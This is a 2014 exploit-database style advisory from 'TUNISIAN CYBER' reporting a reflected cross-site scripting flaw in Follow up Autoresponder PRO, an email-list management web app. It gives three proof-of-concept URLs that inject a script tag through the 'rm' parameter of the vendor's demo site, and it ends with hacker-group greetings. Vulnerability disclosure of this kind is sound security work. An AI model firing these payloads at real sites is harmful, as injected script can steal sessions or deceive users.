[+] Author: TUNISIAN CYBER
[+] Exploit Title: Follow up Autoresponder PRO Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Vendor: http://www.scripts4webmasters.com/
[+] Friendly Sites: na3il.com,th3-creative.com
###############################################################
+Description:
Web based php/mysql email list management software where you can get subscriber names, email addresses to do contact management email marketing.

+Exploit:
Follow up Autoresponder PRO suffers from a Cross Site Scripting vulnerability

+PoC:(Tested on Demo)
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(986987)</ScRiPt>
http://www.scripts4webmasters.com/arppro-demo/?rm=license'%22()%26%25<ScRiPt%20>prompt(941203)</ScRiPt>
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(918540)</ScRiPt>

########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################